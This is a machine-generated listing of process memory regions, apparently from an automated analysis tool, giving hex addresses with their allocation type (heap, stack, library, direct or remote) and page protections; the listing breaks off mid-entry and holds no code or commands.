||
7E80000
|
trusted library allocation
|
page read and write
|
||
7085000
|
heap
|
page execute and read and write
|
||
65F9000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
4A6F000
|
heap
|
page read and write
|
||
2C3E000
|
heap
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
2B72000
|
heap
|
page read and write
|
||
2C1F000
|
stack
|
page read and write
|
||
5940000
|
heap
|
page read and write
|
||
6565000
|
heap
|
page read and write
|
||
50C2000
|
heap
|
page read and write
|
||
51EB000
|
heap
|
page read and write
|
||
6006000
|
heap
|
page read and write
|
||
6005000
|
heap
|
page read and write
|
||
EDF000
|
heap
|
page read and write
|
||
76A5000
|
heap
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
6470000
|
trusted library allocation
|
page read and write
|
||
89C0000
|
trusted library allocation
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
2D0E000
|
heap
|
page read and write
|
||
4F5E000
|
stack
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
658D000
|
heap
|
page read and write
|
||
312E000
|
stack
|
page read and write
|
||
5061000
|
heap
|
page read and write
|
||
51FD000
|
heap
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
7300000
|
direct allocation
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
897E000
|
stack
|
page read and write
|
||
5F20000
|
heap
|
page read and write
|
||
6596000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
765E000
|
stack
|
page read and write
|
||
54EE000
|
heap
|
page read and write
|
||
13E8000
|
heap
|
page read and write
|
||
34F4000
|
trusted library allocation
|
page read and write
|
||
6533000
|
heap
|
page read and write
|
||
8DE0000
|
trusted library allocation
|
page read and write
|
||
657C000
|
heap
|
page read and write
|
||
65E7000
|
heap
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
6005000
|
heap
|
page read and write
|
||
6003000
|
heap
|
page read and write
|
||
5F21000
|
heap
|
page read and write
|
||
5075000
|
heap
|
page read and write
|
||
2C2D000
|
heap
|
page read and write
|
||
6004000
|
heap
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
2DF9000
|
heap
|
page read and write
|
||
4C97000
|
trusted library allocation
|
page execute and read and write
|
||
65AF000
|
heap
|
page read and write
|
||
8FBE000
|
stack
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
6214000
|
trusted library allocation
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
716C000
|
stack
|
page read and write
|
||
2BC3000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
3615000
|
heap
|
page read and write
|
||
8E2E000
|
stack
|
page read and write
|
||
65D4000
|
heap
|
page read and write
|
||
71EE000
|
stack
|
page read and write
|
||
50DD000
|
heap
|
page read and write
|
||
54EE000
|
heap
|
page read and write
|
||
2D8F000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
2BAD000
|
heap
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
7B20000
|
heap
|
page execute and read and write
|
||
6579000
|
heap
|
page read and write
|
||
8977000
|
trusted library allocation
|
page read and write
|
||
788F000
|
stack
|
page read and write
|
||
872E000
|
stack
|
page read and write
|
||
4F5E000
|
stack
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
5F88000
|
heap
|
page read and write
|
||
656C000
|
heap
|
page read and write
|
||
7C32000
|
heap
|
page read and write
|
||
5202000
|
trusted library allocation
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
50E0000
|
heap
|
page execute and read and write
|
||
6564000
|
heap
|
page read and write
|
||
5451000
|
trusted library allocation
|
page read and write
|
||
571E000
|
stack
|
page read and write
|
||
2B72000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
7998000
|
heap
|
page read and write
|
||
501D000
|
heap
|
page read and write
|
||
8740000
|
trusted library allocation
|
page execute and read and write
|
||
4C6D000
|
trusted library allocation
|
page execute and read and write
|
||
6BDC000
|
stack
|
page read and write
|
||
6F5E000
|
stack
|
page read and write
|
||
3509000
|
trusted library allocation
|
page read and write
|
||
5F2F000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
5F87000
|
heap
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
2C07000
|
heap
|
page read and write
|
||
54D6000
|
heap
|
page read and write
|
||
79A4000
|
heap
|
page read and write
|
||
36D0000
|
heap
|
page readonly
|
||
50A5000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
50BD000
|
heap
|
page read and write
|
||
65A0000
|
heap
|
page read and write
|
||
34FD000
|
trusted library allocation
|
page execute and read and write
|
||
5F89000
|
heap
|
page read and write
|
||
9100000
|
trusted library allocation
|
page read and write
|
||
51F5000
|
trusted library allocation
|
page read and write
|
||
658E000
|
heap
|
page read and write
|
||
2D00000
|
trusted library allocation
|
page read and write
|
||
890D000
|
stack
|
page read and write
|
||
54EA000
|
heap
|
page read and write
|
||
85D0000
|
direct allocation
|
page read and write
|
||
2D28000
|
heap
|
page read and write
|
||
4CFE000
|
stack
|
page read and write
|
||
4EF0000
|
heap
|
page read and write
|
||
7132000
|
direct allocation
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
2C65000
|
heap
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
93AC000
|
stack
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
775D000
|
stack
|
page read and write
|
||
3190000
|
trusted library allocation
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
8DD0000
|
trusted library allocation
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
31B5000
|
trusted library allocation
|
page execute and read and write
|
||
2DEA000
|
heap
|
page read and write
|
||
6159000
|
trusted library allocation
|
page read and write
|
||
673A000
|
trusted library allocation
|
page read and write
|
||
751A000
|
stack
|
page read and write
|
||
50B5000
|
heap
|
page read and write
|
||
5013000
|
heap
|
page read and write
|
||
5075000
|
heap
|
page read and write
|
||
759B000
|
stack
|
page read and write
|
||
4DDE000
|
stack
|
page read and write
|
||
65D1000
|
heap
|
page read and write
|
||
3602000
|
heap
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
8ACD000
|
heap
|
page read and write
|
||
531B000
|
trusted library allocation
|
page read and write
|
||
6567000
|
heap
|
page read and write
|
||
54EC000
|
heap
|
page read and write
|
||
5198000
|
trusted library allocation
|
page read and write
|
||
769A000
|
stack
|
page read and write
|
||
2C3D000
|
heap
|
page read and write
|
||
730B000
|
stack
|
page read and write
|
||
8B49000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
C8E000
|
stack
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
51FD000
|
trusted library allocation
|
page read and write
|
||
29DF000
|
stack
|
page read and write
|
||
7D7E000
|
stack
|
page read and write
|
||
2BBA000
|
heap
|
page read and write
|
||
4B60000
|
heap
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
7130000
|
trusted library allocation
|
page execute and read and write
|
||
4C64000
|
trusted library allocation
|
page read and write
|
||
50D1000
|
heap
|
page read and write
|
||
517F000
|
trusted library allocation
|
page read and write
|
||
65C7000
|
heap
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
EFE000
|
stack
|
page read and write
|
||
3390000
|
heap
|
page execute and read and write
|
||
E40000
|
heap
|
page read and write
|
||
6479000
|
trusted library allocation
|
page read and write
|
||
77EC000
|
trusted library allocation
|
page read and write
|
||
4730000
|
heap
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
2B88000
|
heap
|
page read and write
|
||
70CD000
|
stack
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
3540000
|
trusted library allocation
|
page read and write
|
||
64C3000
|
heap
|
page read and write
|
||
5806000
|
trusted library allocation
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
3180000
|
trusted library allocation
|
page read and write
|
||
75C000
|
stack
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
7CBE000
|
stack
|
page read and write
|
||
36E8000
|
trusted library allocation
|
page read and write
|
||
7390000
|
heap
|
page execute and read and write
|
||
5F88000
|
heap
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
343E000
|
stack
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
506F000
|
heap
|
page read and write
|
||
501D000
|
heap
|
page read and write
|
||
790E000
|
stack
|
page read and write
|
||
85DE000
|
direct allocation
|
page read and write
|
||
4F21000
|
trusted library allocation
|
page read and write
|
||
64C6000
|
heap
|
page read and write
|
||
2BA1000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
2C07000
|
heap
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
2D27000
|
heap
|
page read and write
|
||
2D41000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
5950000
|
heap
|
page read and write
|
||
789E000
|
stack
|
page read and write
|
||
519C000
|
trusted library allocation
|
page read and write
|
||
50F0000
|
trusted library allocation
|
page read and write
|
||
580A000
|
trusted library allocation
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
5F88000
|
heap
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
5169000
|
trusted library allocation
|
page read and write
|
||
5495000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
619B000
|
trusted library allocation
|
page read and write
|
||
31D6000
|
heap
|
page read and write
|
||
8480000
|
heap
|
page read and write
|
||
E9C000
|
heap
|
page read and write
|
||
2BC3000
|
heap
|
page read and write
|
||
54A4000
|
heap
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
8AC3000
|
heap
|
page read and write
|
||
2DFC000
|
heap
|
page read and write
|
||
4D3E000
|
stack
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
51EB000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
7EF00000
|
trusted library allocation
|
page execute and read and write
|
||
2B5E000
|
heap
|
page read and write
|
||
54EC000
|
heap
|
page read and write
|
||
652F000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
2BA8000
|
heap
|
page read and write
|
||
2D8D000
|
heap
|
page read and write
|
||
5F2F000
|
heap
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
6606000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
66C0000
|
trusted library allocation
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
7C7E000
|
stack
|
page read and write
|
||
4A9C000
|
stack
|
page read and write
|
||
5022000
|
heap
|
page read and write
|
||
33C8000
|
heap
|
page read and write
|
||
65A1000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page execute and read and write
|
||
5074000
|
heap
|
page read and write
|
||
3608000
|
heap
|
page read and write
|
||
5244000
|
trusted library allocation
|
page read and write
|
||
2E15000
|
heap
|
page read and write
|
||
657B000
|
heap
|
page read and write
|
||
6597000
|
heap
|
page read and write
|
||
5261000
|
heap
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
65E1000
|
heap
|
page read and write
|
||
5321000
|
trusted library allocation
|
page read and write
|
||
D0D000
|
stack
|
page read and write
|
||
2BCB000
|
heap
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page read and write
|
||
36CF000
|
stack
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
8730000
|
heap
|
page read and write
|
||
7C3B000
|
heap
|
page read and write
|
||
2B8A000
|
heap
|
page read and write
|
||
2E1C000
|
heap
|
page read and write
|
||
355A000
|
heap
|
page read and write
|
||
3370000
|
trusted library allocation
|
page read and write
|
||
8A75000
|
heap
|
page read and write
|
||
51C3000
|
heap
|
page read and write
|
||
30A9000
|
heap
|
page read and write
|
||
2DDB000
|
heap
|
page read and write
|
||
5F2B000
|
heap
|
page read and write
|
||
8B67000
|
heap
|
page read and write
|
||
679A000
|
trusted library allocation
|
page read and write
|
||
2BB7000
|
heap
|
page read and write
|
||
92D0000
|
heap
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
15DE000
|
stack
|
page read and write
|
||
2E09000
|
heap
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
2BA1000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
8420000
|
trusted library allocation
|
page execute and read and write
|
||
54D4000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
65A9000
|
heap
|
page read and write
|
||
795D000
|
stack
|
page read and write
|
||
50C5000
|
heap
|
page execute and read and write
|
||
29E0000
|
heap
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page read and write
|
||
547D000
|
heap
|
page read and write
|
||
63F0000
|
trusted library allocation
|
page execute
|
||
65E6000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
5F89000
|
heap
|
page read and write
|
||
2ADF000
|
stack
|
page read and write
|
||
748C000
|
stack
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
7970000
|
trusted library allocation
|
page execute and read and write
|
||
8B7F000
|
heap
|
page read and write
|
||
7A22000
|
heap
|
page read and write
|
||
621F000
|
trusted library allocation
|
page read and write
|
||
2E08000
|
heap
|
page read and write
|
||
3510000
|
trusted library allocation
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
5BBF000
|
stack
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
655B000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
531D000
|
trusted library allocation
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
4A66000
|
heap
|
page read and write
|
||
2C34000
|
heap
|
page read and write
|
||
5388000
|
trusted library allocation
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
658F000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
5161000
|
heap
|
page read and write
|
||
537B000
|
trusted library allocation
|
page read and write
|
||
5F2F000
|
heap
|
page read and write
|
||
894F000
|
stack
|
page read and write
|
||
4C63000
|
trusted library allocation
|
page execute and read and write
|
||
2D30000
|
heap
|
page read and write
|
||
520B000
|
trusted library allocation
|
page read and write
|
||
31B0000
|
trusted library allocation
|
page read and write
|
||
2D04000
|
heap
|
page read and write
|
||
65E1000
|
heap
|
page read and write
|
||
64C6000
|
heap
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
34E0000
|
trusted library allocation
|
page read and write
|
||
6031000
|
trusted library allocation
|
page read and write
|
||
30CD000
|
heap
|
page read and write
|
||
64A1000
|
heap
|
page read and write
|
||
2C36000
|
heap
|
page read and write
|
||
78CE000
|
stack
|
page read and write
|
||
7F3F8000
|
trusted library allocation
|
page execute and read and write
|
||
593B000
|
trusted library allocation
|
page read and write
|
||
E3F000
|
stack
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page read and write
|
||
602A000
|
trusted library allocation
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
2D08000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
2D4F000
|
heap
|
page read and write
|
||
784E000
|
stack
|
page read and write
|
||
33A0000
|
trusted library allocation
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
27EB000
|
stack
|
page read and write
|
||
5094000
|
heap
|
page read and write
|
||
724E000
|
stack
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
4EDF000
|
stack
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
5160000
|
heap
|
page read and write
|
||
73BE000
|
stack
|
page read and write
|
||
485E000
|
stack
|
page read and write
|
||
8A89000
|
heap
|
page read and write
|
||
747E000
|
stack
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
621B000
|
trusted library allocation
|
page read and write
|
||
50BA000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
37A8000
|
heap
|
page read and write
|
||
7BEE000
|
stack
|
page read and write
|
||
8750000
|
trusted library allocation
|
page read and write
|
||
2DF6000
|
heap
|
page read and write
|
||
2E1C000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
505C000
|
heap
|
page read and write
|
||
54EE000
|
heap
|
page read and write
|
||
65E6000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
8A22000
|
trusted library allocation
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
50C5000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2DE5000
|
heap
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
53E8000
|
trusted library allocation
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
66F0000
|
trusted library allocation
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
2D08000
|
heap
|
page read and write
|
||
7140000
|
direct allocation
|
page read and write
|
||
4C60000
|
heap
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
65E6000
|
heap
|
page read and write
|
||
8C70000
|
trusted library allocation
|
page read and write
|
||
4A60000
|
heap
|
page read and write
|
||
347E000
|
stack
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
51E8000
|
trusted library allocation
|
page read and write
|
||
7BA9000
|
heap
|
page read and write
|
||
2BA1000
|
heap
|
page read and write
|
||
5097000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
500B000
|
heap
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
677F000
|
trusted library allocation
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
2BB7000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
5F30000
|
heap
|
page read and write
|
||
2C20000
|
heap
|
page read and write
|
||
54C1000
|
heap
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
5630000
|
heap
|
page read and write
|
||
536C000
|
trusted library allocation
|
page read and write
|
||
4F9E000
|
stack
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
86EE000
|
stack
|
page read and write
|
||
EBE000
|
stack
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
8F70000
|
trusted library allocation
|
page read and write
|
||
2D76000
|
heap
|
page read and write
|
||
7850000
|
heap
|
page execute and read and write
|
||
78B0000
|
heap
|
page execute and read and write
|
||
65A9000
|
heap
|
page read and write
|
||
8980000
|
trusted library allocation
|
page read and write
|
||
50A0000
|
heap
|
page read and write
|
||
6005000
|
heap
|
page read and write
|
||
7B99000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
6021000
|
trusted library allocation
|
page read and write
|
||
7125000
|
trusted library allocation
|
page read and write
|
||
54D4000
|
heap
|
page read and write
|
||
54EA000
|
heap
|
page read and write
|
||
65E0000
|
heap
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
5167000
|
trusted library allocation
|
page read and write
|
||
3610000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
FEB000
|
stack
|
page read and write
|
||
5491000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
52DE000
|
heap
|
page read and write
|
||
52C8000
|
trusted library allocation
|
page read and write
|
||
2DF4000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
6006000
|
heap
|
page read and write
|
||
65E7000
|
heap
|
page read and write
|
||
755E000
|
stack
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
743E000
|
stack
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
2DE3000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
2DE6000
|
heap
|
page read and write
|
||
2B48000
|
heap
|
page read and write
|
||
84CD000
|
stack
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
7395000
|
heap
|
page execute and read and write
|
||
64C7000
|
heap
|
page read and write
|
||
75EC000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
2E0D000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
E5D000
|
stack
|
page read and write
|
||
7961000
|
heap
|
page read and write
|
||
B38000
|
stack
|
page read and write
|
||
5F91000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
5155000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page readonly
|
||
622B000
|
trusted library allocation
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
8B0D000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
6002000
|
heap
|
page read and write
|
||
5440000
|
heap
|
page read and write
|
||
2D0A000
|
heap
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
BFE000
|
stack
|
page read and write
|
||
6F9E000
|
stack
|
page read and write
|
||
701F000
|
stack
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
54C0000
|
heap
|
page read and write
|
||
4BD0000
|
heap
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
85B0000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
656A000
|
heap
|
page read and write
|
||
6023000
|
trusted library allocation
|
page read and write
|
||
318F000
|
heap
|
page read and write
|
||
8770000
|
heap
|
page read and write
|
||
74CD000
|
stack
|
page read and write
|
||
5400000
|
direct allocation
|
page read and write
|
||
779B000
|
stack
|
page read and write
|
||
653B000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page execute and read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
E1C000
|
stack
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
7B40000
|
heap
|
page read and write
|
||
29E5000
|
heap
|
page read and write
|
||
8B52000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
71CE000
|
stack
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
4A1E000
|
stack
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
34BF000
|
stack
|
page read and write
|
||
5BFB000
|
stack
|
page read and write
|
||
50B8000
|
heap
|
page read and write
|
||
7350000
|
heap
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
368E000
|
stack
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
3155000
|
heap
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
7937000
|
heap
|
page read and write
|
||
65FE000
|
trusted library allocation
|
page read and write
|
||
2C2B000
|
heap
|
page read and write
|
||
3199000
|
trusted library allocation
|
page read and write
|
||
905B000
|
stack
|
page read and write
|
||
30A0000
|
heap
|
page read and write
|
||
5F25000
|
heap
|
page read and write
|
||
7951000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
528E000
|
trusted library allocation
|
page read and write
|
||
7122000
|
direct allocation
|
page read and write
|
||
32BF000
|
stack
|
page read and write
|
||
6025000
|
trusted library allocation
|
page read and write
|
||
602E000
|
trusted library allocation
|
page read and write
|
||
1030000
|
heap
|
page read and write
|
||
6533000
|
heap
|
page read and write
|
||
6564000
|
heap
|
page read and write
|
||
64A0000
|
heap
|
page read and write
|
||
3740000
|
trusted library allocation
|
page execute and read and write
|
||
8FFF000
|
stack
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
72E0000
|
direct allocation
|
page read and write
|
||
309E000
|
stack
|
page read and write
|
||
6005000
|
heap
|
page read and write
|
||
6528000
|
heap
|
page read and write
|
||
30D2000
|
heap
|
page read and write
|
||
4A64000
|
heap
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
65ED000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
6005000
|
heap
|
page read and write
|
||
2A2E000
|
stack
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
F47000
|
heap
|
page read and write
|
||
7111000
|
trusted library allocation
|
page read and write
|
||
4AE0000
|
trusted library allocation
|
page execute and read and write
|
||
3581000
|
heap
|
page read and write
|
||
2BA6000
|
heap
|
page read and write
|
||
770E000
|
stack
|
page read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
65B5000
|
heap
|
page read and write
|
||
7480000
|
heap
|
page read and write
|
||
6003000
|
heap
|
page read and write
|
||
85DE000
|
direct allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
534E000
|
trusted library allocation
|
page read and write
|
||
50C0000
|
heap
|
page execute and read and write
|
||
5369000
|
trusted library allocation
|
page read and write
|
||
2E0C000
|
heap
|
page read and write
|
||
9110000
|
trusted library allocation
|
page read and write
|
||
5013000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
63B0000
|
trusted library allocation
|
page read and write
|
||
5075000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
74DD000
|
stack
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
65E6000
|
trusted library allocation
|
page read and write
|
||
50DD000
|
heap
|
page read and write
|
||
6FDE000
|
stack
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
909C000
|
stack
|
page read and write
|
||
64C1000
|
heap
|
page read and write
|
||
546F000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
538C000
|
trusted library allocation
|
page read and write
|
||
2B88000
|
heap
|
page read and write
|
||
5077000
|
trusted library allocation
|
page read and write
|
||
532D000
|
trusted library allocation
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
5F2F000
|
heap
|
page read and write
|
||
65A7000
|
heap
|
page read and write
|
||
54D6000
|
heap
|
page read and write
|
||
50BD000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
6131000
|
trusted library allocation
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
4FE1000
|
heap
|
page read and write
|
||
652F000
|
heap
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
8B2D000
|
heap
|
page read and write
|
||
610E000
|
stack
|
page read and write
|
||
F9D000
|
stack
|
page read and write
|
||
4D70000
|
heap
|
page execute and read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
2BB7000
|
heap
|
page read and write
|
||
2BCB000
|
heap
|
page read and write
|
||
5498000
|
heap
|
page read and write
|
||
2BCB000
|
heap
|
page read and write
|
||
5482000
|
heap
|
page read and write
|
||
513E000
|
trusted library allocation
|
page read and write
|
||
55A7000
|
trusted library allocation
|
page read and write
|
||
4D04000
|
heap
|
page read and write
|
||
2BA1000
|
heap
|
page read and write
|
||
741B000
|
stack
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
8C60000
|
trusted library allocation
|
page read and write
|
||
2DF9000
|
heap
|
page read and write
|
||
6CDC000
|
stack
|
page read and write
|
||
54C9000
|
heap
|
page read and write
|
||
65F7000
|
trusted library allocation
|
page read and write
|
||
73DD000
|
stack
|
page read and write
|
||
2F1E000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
5077000
|
heap
|
page read and write
|
||
539C000
|
stack
|
page read and write
|
||
2DEE000
|
heap
|
page read and write
|
||
658E000
|
heap
|
page read and write
|
||
31B2000
|
trusted library allocation
|
page read and write
|
||
8890000
|
trusted library allocation
|
page read and write
|
||
8470000
|
heap
|
page read and write
|
||
2C3E000
|
heap
|
page read and write
|
||
2E08000
|
heap
